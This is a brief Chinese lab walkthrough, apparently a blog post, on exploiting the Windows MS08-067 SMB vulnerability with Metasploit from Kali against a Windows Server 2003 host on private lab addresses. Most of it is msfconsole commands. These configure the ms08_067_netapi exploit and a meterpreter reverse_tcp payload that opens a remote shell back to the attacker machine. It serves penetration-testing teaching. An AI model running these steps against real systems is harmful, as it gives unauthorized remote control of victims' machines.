使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程

0x01 实验环境

攻击机:kali linux 
ip:10.10.10.131
目标机:windows server 2003
ip:10.10.10.130

0x02 配置exploit

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set rhost 10.10.10.130
rhost => 10.10.10.130

设置目标机的IP,其他选项默认就可以;


0x03 配置payload

payload只需要配置监听返回会话的IP;
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 10.10.10.131
lhost => 10.10.10.131

0x04 开始攻击

msf exploit(ms08_067_netapi) > exploit

成功获得session。

使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程_第1张图片

你可能感兴趣的:(windows)